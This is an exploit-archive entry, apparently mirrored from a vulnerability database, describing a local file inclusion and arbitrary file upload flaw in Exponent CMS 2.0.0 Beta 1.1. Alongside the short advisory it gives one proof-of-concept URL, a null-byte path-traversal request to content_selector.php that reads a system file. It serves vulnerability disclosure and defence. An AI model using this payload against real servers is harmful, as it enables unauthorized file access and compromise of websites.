[] NeoSense
E X P L O I T S
title author type platform port cve id

Exponent CMS 2.0.0 Beta 1.1 - Local File Inclusion / Arbitrary File Upload

Author: AutoSec Tools
type: webapps
platform: php
port: 
date_added: 2011-05-09 
date_updated: 2015-01-07 
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 
source: https://www.securityfocus.com/bid/47757/info

Exponent CMS is prone to a local file-include vulnerability and an arbitrary-file-upload vulnerability.

An attacker can exploit these issues to upload arbitrary files onto the webserver, execute arbitrary local files within the context of the webserver, and obtain sensitive information.

Exponent CMS 2.0.0 beta 1.1 is vulnerable; other versions may also be affected.

http://www.example.com/exponent/content_selector.php?controller=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00&section=&action=
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.